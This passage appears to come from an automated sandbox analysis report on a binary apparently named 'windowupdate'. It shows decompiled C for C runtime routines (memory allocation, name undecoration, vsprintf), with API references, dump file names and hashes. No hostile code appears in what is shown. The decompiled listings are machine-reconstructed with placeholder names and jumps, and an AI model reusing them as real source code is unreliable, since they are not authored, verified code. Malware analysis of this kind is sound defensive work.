                      • Opcode Fuzzy Hash: 97d5f6365fec4f7d5572bbf508e317190337378f64b689c5fa46882306a058c3
                      • Instruction Fuzzy Hash: 9A018C71A40309FBDF209FA6DD0AF6A3BA89B04785F144510F908DA381EAB1EA00D7B0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D469E3 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 62%
                      			E00D469E3(void* __edi) {
				intOrPtr _t2;
				void* _t6;
				void* _t12;
				void* _t15;
				void _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t20;

				_t15 = __edi;
				_t2 =  *0xf20208; // 0x0
				if(_t2 != 0) {
					L3:
					if(_t2 != 1) {
						__imp__InterlockedPopEntrySList(_t2);
						_t19 = _t2;
						if(_t19 == 0) {
							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t20 != 0) {
								__imp__InterlockedPopEntrySList( *0xf20208, _t15);
								_t16 =  *_t20;
								if(_t16 == 0) {
									_t1 = _t20 + 0xff0; // 0xff0
									_t17 = _t1;
									do {
										__imp__InterlockedPushEntrySList( *0xf20208, _t20);
										_t20 = _t20 + 0x10;
									} while (_t20 < _t17);
									_t6 = _t20;
									L15:
									return _t6;
								}
								VirtualFree(_t20, 0, 0x8000);
								_t6 = _t16;
								goto L15;
							}
							L9:
							RaiseException(0xc0000017, 0, 0, 0);
							return 0;
						}
						E00D4AF80(_t15, _t19, 0, 0xd);
						return _t19;
					}
					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
					if(_t12 == 0) {
						goto L9;
					}
					return _t12;
				}
				if(E00D46AF9() == 0) {
					goto L9;
				}
				_t2 =  *0xf20208; // 0x0
				goto L3;
			}











                      0x00d469e3
                      0x00d469e3
                      0x00d469ee
                      0x00d469fe
                      0x00d46a01
                      0x00d46a1e
                      0x00d46a24
                      0x00d46a28
                      0x00d46a4b
                      0x00d46a4f
                      0x00d46a6c
                      0x00d46a72
                      0x00d46a76
                      0x00d46a89
                      0x00d46a89
                      0x00d46a8f
                      0x00d46a96
                      0x00d46a9c
                      0x00d46a9f
                      0x00d46aa3
                      0x00d46aa5
                      0x00000000
                      0x00d46aa5
                      0x00d46a7f
                      0x00d46a85
                      0x00000000
                      0x00d46a85
                      0x00d46a51
                      0x00d46a59
                      0x00000000
                      0x00d46a5f
                      0x00d46a2f
                      0x00000000
                      0x00d46a37
                      0x00d46a0e
                      0x00d46a16
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00d46a16
                      0x00d469f7
                      0x00000000
                      0x00000000
                      0x00d469f9
                      0x00000000

                      APIs
                      • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A07
                      • HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A0E
                        • Part of subcall function 00D46AF9: IsProcessorFeaturePresent.KERNEL32(0000000C,00D469F5,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46AFB
                      • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A1E
                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00D46BAD,?,?,00D34CBB), ref: 00D46A45
                      • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A59
                      • InterlockedPopEntrySList.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A6C
                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A7F
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                      • String ID:
                      • API String ID: 2460949444-0
                      • Opcode ID: 9c58d7cb27338b5eecfdc5aa6872cf17bbff7f1a8e024aea47eaebec0f178810
                      • Instruction ID: 2c3f11a006cfb62a8f3aaf221224d0bd124808304220d8401066102a4a59441a
                      • Opcode Fuzzy Hash: 9c58d7cb27338b5eecfdc5aa6872cf17bbff7f1a8e024aea47eaebec0f178810
                      • Instruction Fuzzy Hash: 04110472740B13BBE6315B68AC4AF273259EF05785F184021FA82F6251DB20CC015BB6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4FD40 Relevance: 12.1, APIs: 8, Instructions: 51COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D4FD40(intOrPtr __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;

				_v8 = __ecx;
				if(E00D5A6C0(_v8) != 0) {
					if(E00D5A560(_v8) == 0) {
						if(E00D5A560(_a4) == 0) {
							E00D4E8C0(_v8,  *_a4);
						} else {
							_v12 = E00D5AB70(_a4);
							if(_v12 != 0) {
								E00D4FF10(_v8, _v12);
							}
						}
					} else {
						if(E00D5A560(_a4) == 0) {
							E00D4F820(_v8, _a4);
						} else {
							E00D4F920(_v8, E00D5AB70(_a4));
						}
					}
				}
				return _v8;
			}





                      0x00d4fd46
                      0x00d4fd53
                      0x00d4fd5f
                      0x00d4fd98
                      0x00d4fdc4
                      0x00d4fd9a
                      0x00d4fda2
                      0x00d4fda9
                      0x00d4fdb4
                      0x00d4fdb4
                      0x00d4fdb9
                      0x00d4fd61
                      0x00d4fd6b
                      0x00d4fd87
                      0x00d4fd6d
                      0x00d4fd79
                      0x00d4fd79
                      0x00d4fd8c
                      0x00d4fd5f
                      0x00d4fdcf

                      APIs
                      • DName::isValid.LIBCMTD ref: 00D4FD4C
                      • DName::isEmpty.LIBCMTD ref: 00D4FD58
                      • DName::isEmpty.LIBCMTD ref: 00D4FD64
                      • DName::operator=.LIBVCRUNTIMED ref: 00D4FD79
                        • Part of subcall function 00D4F920: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F957
                      • Mailbox.LIBCMTD ref: 00D4FD87
                      • DName::isEmpty.LIBCMTD ref: 00D4FD91
                      • DName::operator+=.LIBCMTD ref: 00D4FDB4
                        • Part of subcall function 00D4FF10: DName::isValid.LIBCMTD ref: 00D4FF1A
                        • Part of subcall function 00D4FF10: DName::isEmpty.LIBCMTD ref: 00D4FF26
                        • Part of subcall function 00D4FF10: DName::operator=.LIBVCRUNTIMED ref: 00D4FF42
                      • DName::append.LIBCMTD ref: 00D4FDC4
                        • Part of subcall function 00D4E8C0: pairNode::pairNode.LIBCMTD ref: 00D4E8F6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
                      • String ID:
                      • API String ID: 1694665504-0
                      • Opcode ID: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction ID: 7d1cc8e78f4c54ef1a9aa9e527617593a738420f365988b89b675111a429e719
                      • Opcode Fuzzy Hash: 846970c6e897798d1fe47f70cf7f594d770f8d1144d45daf0da9bd6b49569b5d
                      • Instruction Fuzzy Hash: D7110C30A00108EBCF04EFA4D9929AD7BB5EF44340F144576AC069B2A5EF30AE44DBB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5D580 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5D580(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				signed int _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t127;
				void* _t135;
				signed int _t147;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t228;
				void* _t229;
				signed int _t230;
				void* _t231;

				_t229 = __esi;
				_t228 = __edi;
				_t173 = __ecx;
				_t172 = __ebx;
				_t127 =  *0xdf600c; // 0x71e60372
				_v8 = _t127 ^ _t230;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t235 = _v1148;
				if(_v1148 == 0) {
					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t231 = _t231 + 0x18;
					if(_t171 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v1152 = 1;
						L12:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t231 = _t231 + 0x18;
							__eflags = _t168 - 1;
							if(_t168 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00D66CC0(_t172,  &_v1224, _t229, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L20:
								_v1160 = 1;
								L21:
								_v1128 = _v1160;
								_t135 = E00D67A60( &_v1224);
								E00D66BB0( &_v1120, E00D66CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
								_v1124 = E00D6B870(_t172,  &_v1120, _t228, _t229);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_t221 = _a4 & 0x00000002;
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
													L47:
													_t221 = _v1124;
													_v1184 = _v1124;
													E00D670D0( &_v1120);
													E00D67230( &_v1224);
													_t147 = _v1184;
													goto L48;
												}
												_t221 = 0;
												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												_v1180 = 0xfffffffe;
												E00D670D0( &_v1120);
												E00D67230( &_v1224);
												_t147 = _v1180;
												goto L48;
											}
											_v1176 = 0xffffffff;
											E00D670D0( &_v1120);
											E00D67230( &_v1224);
											_t147 = _v1176;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
												} else {
													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												}
											} else {
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L32:
												goto L47;
											}
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L32;
											}
											_v1172 = 0xffffffff;
											E00D670D0( &_v1120);
											E00D67230( &_v1224);
											_t147 = _v1172;
											goto L48;
										}
										 *((short*)(_a12 + _v1132 * 2)) = 0;
										goto L32;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L27;
									}
									_v1168 = 0xffffffff;
									E00D670D0( &_v1120);
									E00D67230( &_v1224);
									_t147 = _v1168;
									goto L48;
								}
								_t221 = _v1124;
								_v1164 = _v1124;
								E00D670D0( &_v1120);
								E00D67230( &_v1224);
								_t147 = _v1164;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v1160 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v1152 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5d580
                      0x00d5d580
                      0x00d5d580
                      0x00d5d580
                      0x00d5d58b
                      0x00d5d592
                      0x00d5d599
                      0x00d5d5a7
                      0x00d5d59b
                      0x00d5d59b
                      0x00d5d59b
                      0x00d5d5b7
                      0x00d5d5bd
                      0x00d5d5c4
                      0x00d5d5de
                      0x00d5d5e3
                      0x00d5d5e9
                      0x00d5d5eb
                      0x00d5d5eb
                      0x00d5d5e9
                      0x00d5d5f3
                      0x00d5d626
                      0x00d5d62a
                      0x00d5d63e
                      0x00d5d63e
                      0x00d5d648
                      0x00d5d64e
                      0x00d5d654
                      0x00d5d65b
                      0x00d5d675
                      0x00d5d67a
                      0x00d5d67d
                      0x00d5d680
                      0x00d5d682
                      0x00d5d682
                      0x00d5d680
                      0x00d5d683
                      0x00d5d68a
                      0x00d5d6c7
                      0x00d5d6ce
                      0x00d5d6d4
                      0x00d5d6da
                      0x00d5d6e0
                      0x00d5d6e9
                      0x00d5d6f2
                      0x00d5d6f8
                      0x00d5d70e
                      0x00d5d714
                      0x00d5d720
                      0x00d5d726
                      0x00d5d73a
                      0x00d5d73a
                      0x00d5d744
                      0x00d5d74a
                      0x00d5d75a
                      0x00d5d785
                      0x00d5d795
                      0x00d5d79b
                      0x00d5d79f
                      0x00d5d7da
                      0x00d5d7e0
                      0x00d5d7ec
                      0x00d5d7f2
                      0x00d5d897
                      0x00d5d8a0
                      0x00d5d8a6
                      0x00d5d8b2
                      0x00d5d8b8
                      0x00d5d90c
                      0x00d5d910
                      0x00d5d942
                      0x00d5d945
                      0x00d5d97e
                      0x00d5d989
                      0x00d5d98d
                      0x00d5d98d
                      0x00d5d993
                      0x00d5d99f
                      0x00d5d9aa
                      0x00d5d9af
                      0x00000000
                      0x00d5d9af
                      0x00d5d947
                      0x00d5d94f
                      0x00d5d954
                      0x00d5d964
                      0x00d5d96f
                      0x00d5d974
                      0x00000000
                      0x00d5d974
                      0x00d5d912
                      0x00d5d922
                      0x00d5d92d
                      0x00d5d932
                      0x00000000
                      0x00d5d932
                      0x00d5d8ba
                      0x00d5d8be
                      0x00d5d8c2
                      0x00d5d8c9
                      0x00d5d8e4
                      0x00d5d8e7
                      0x00d5d8f8
                      0x00d5d903
                      0x00d5d8e9
                      0x00d5d8f1
                      0x00d5d8f1
                      0x00d5d8cb
                      0x00d5d8d8
                      0x00d5d8d8
                      0x00d5d8c9
                      0x00000000
                      0x00d5d907
                      0x00d5d7f8
                      0x00d5d7fc
                      0x00d5d834
                      0x00d5d83a
                      0x00d5d83d
                      0x00d5d850
                      0x00d5d857
                      0x00d5d88f
                      0x00000000
                      0x00d5d88f
                      0x00d5d85f
                      0x00d5d862
                      0x00000000
                      0x00000000
                      0x00d5d864
                      0x00d5d874
                      0x00d5d87f
                      0x00d5d884
                      0x00000000
                      0x00d5d884
                      0x00d5d84a
                      0x00000000
                      0x00d5d84a
                      0x00d5d7fe
                      0x00d5d805
                      0x00000000
                      0x00000000
                      0x00d5d807
                      0x00d5d817
                      0x00d5d822
                      0x00d5d827
                      0x00000000
                      0x00d5d827
                      0x00d5d7a1
                      0x00d5d7a7
                      0x00d5d7b3
                      0x00d5d7be
                      0x00d5d7c3
                      0x00000000
                      0x00d5d7c3
                      0x00d5d728
                      0x00d5d72c
                      0x00000000
                      0x00000000
                      0x00d5d72e
                      0x00000000
                      0x00d5d68c
                      0x00d5d691
                      0x00d5d6b5
                      0x00d5d9b5
                      0x00d5d9c2
                      0x00d5d9c2
                      0x00d5d68a
                      0x00d5d62c
                      0x00d5d630
                      0x00000000
                      0x00000000
                      0x00d5d632
                      0x00000000
                      0x00d5d632
                      0x00d5d5fa
                      0x00d5d61e
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5D779
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 2122a17c7f0503420548aaaacc086f9b552963d9b302313535b1badf62d85a67
                      • Instruction ID: 55059e466fbe01c3da5f68fff3735d885264ac20474a1471b43babcaa312cf3b
                      • Opcode Fuzzy Hash: 2122a17c7f0503420548aaaacc086f9b552963d9b302313535b1badf62d85a67
                      • Instruction Fuzzy Hash: 7DC125B09042198BDF34DF14CC92BAAB7B1AF45319F1041D8EA4967291DB709E89CF7A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5E680 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5E680(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				signed int _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t127;
				void* _t135;
				signed int _t147;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t228;
				void* _t229;
				signed int _t230;
				void* _t231;

				_t229 = __esi;
				_t228 = __edi;
				_t173 = __ecx;
				_t172 = __ebx;
				_t127 =  *0xdf600c; // 0x71e60372
				_v8 = _t127 ^ _t230;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t235 = _v1148;
				if(_v1148 == 0) {
					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t231 = _t231 + 0x18;
					if(_t171 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v1152 = 1;
						L12:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t231 = _t231 + 0x18;
							__eflags = _t168 - 1;
							if(_t168 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00D66CC0(_t172,  &_v1224, _t229, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L20:
								_v1160 = 1;
								L21:
								_v1128 = _v1160;
								_t135 = E00D67A60( &_v1224);
								E00D66C10( &_v1120, E00D66CA0( &_v1228,  &_v1140), _a4, _a8, _a20, _t135, _a28);
								_v1124 = E00D6BDD0(_t172,  &_v1120, _t228, _t229);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_t221 = _a4 & 0x00000002;
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
													L47:
													_t221 = _v1124;
													_v1184 = _v1124;
													E00D67110( &_v1120);
													E00D67230( &_v1224);
													_t147 = _v1184;
													goto L48;
												}
												_t221 = 0;
												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												_v1180 = 0xfffffffe;
												E00D67110( &_v1120);
												E00D67230( &_v1224);
												_t147 = _v1180;
												goto L48;
											}
											_v1176 = 0xffffffff;
											E00D67110( &_v1120);
											E00D67230( &_v1224);
											_t147 = _v1176;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v1132 * 2)) = 0;
												} else {
													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												}
											} else {
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L32:
												goto L47;
											}
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L32;
											}
											_v1172 = 0xffffffff;
											E00D67110( &_v1120);
											E00D67230( &_v1224);
											_t147 = _v1172;
											goto L48;
										}
										 *((short*)(_a12 + _v1132 * 2)) = 0;
										goto L32;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L27;
									}
									_v1168 = 0xffffffff;
									E00D67110( &_v1120);
									E00D67230( &_v1224);
									_t147 = _v1168;
									goto L48;
								}
								_t221 = _v1124;
								_v1164 = _v1124;
								E00D67110( &_v1120);
								E00D67230( &_v1224);
								_t147 = _v1164;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v1160 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v1152 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5e680
                      0x00d5e680
                      0x00d5e680
                      0x00d5e680
                      0x00d5e68b
                      0x00d5e692
                      0x00d5e699
                      0x00d5e6a7
                      0x00d5e69b
                      0x00d5e69b
                      0x00d5e69b
                      0x00d5e6b7
                      0x00d5e6bd
                      0x00d5e6c4
                      0x00d5e6de
                      0x00d5e6e3
                      0x00d5e6e9
                      0x00d5e6eb
                      0x00d5e6eb
                      0x00d5e6e9
                      0x00d5e6f3
                      0x00d5e726
                      0x00d5e72a
                      0x00d5e73e
                      0x00d5e73e
                      0x00d5e748
                      0x00d5e74e
                      0x00d5e754
                      0x00d5e75b
                      0x00d5e775
                      0x00d5e77a
                      0x00d5e77d
                      0x00d5e780
                      0x00d5e782
                      0x00d5e782
                      0x00d5e780
                      0x00d5e783
                      0x00d5e78a
                      0x00d5e7c7
                      0x00d5e7ce
                      0x00d5e7d4
                      0x00d5e7da
                      0x00d5e7e0
                      0x00d5e7e9
                      0x00d5e7f2
                      0x00d5e7f8
                      0x00d5e80e
                      0x00d5e814
                      0x00d5e820
                      0x00d5e826
                      0x00d5e83a
                      0x00d5e83a
                      0x00d5e844
                      0x00d5e84a
                      0x00d5e85a
                      0x00d5e885
                      0x00d5e895
                      0x00d5e89b
                      0x00d5e89f
                      0x00d5e8da
                      0x00d5e8e0
                      0x00d5e8ec
                      0x00d5e8f2
                      0x00d5e997
                      0x00d5e9a0
                      0x00d5e9a6
                      0x00d5e9b2
                      0x00d5e9b8
                      0x00d5ea0c
                      0x00d5ea10
                      0x00d5ea42
                      0x00d5ea45
                      0x00d5ea7e
                      0x00d5ea89
                      0x00d5ea8d
                      0x00d5ea8d
                      0x00d5ea93
                      0x00d5ea9f
                      0x00d5eaaa
                      0x00d5eaaf
                      0x00000000
                      0x00d5eaaf
                      0x00d5ea47
                      0x00d5ea4f
                      0x00d5ea54
                      0x00d5ea64
                      0x00d5ea6f
                      0x00d5ea74
                      0x00000000
                      0x00d5ea74
                      0x00d5ea12
                      0x00d5ea22
                      0x00d5ea2d
                      0x00d5ea32
                      0x00000000
                      0x00d5ea32
                      0x00d5e9ba
                      0x00d5e9be
                      0x00d5e9c2
                      0x00d5e9c9
                      0x00d5e9e4
                      0x00d5e9e7
                      0x00d5e9f8
                      0x00d5ea03
                      0x00d5e9e9
                      0x00d5e9f1
                      0x00d5e9f1
                      0x00d5e9cb
                      0x00d5e9d8
                      0x00d5e9d8
                      0x00d5e9c9
                      0x00000000
                      0x00d5ea07
                      0x00d5e8f8
                      0x00d5e8fc
                      0x00d5e934
                      0x00d5e93a
                      0x00d5e93d
                      0x00d5e950
                      0x00d5e957
                      0x00d5e98f
                      0x00000000
                      0x00d5e98f
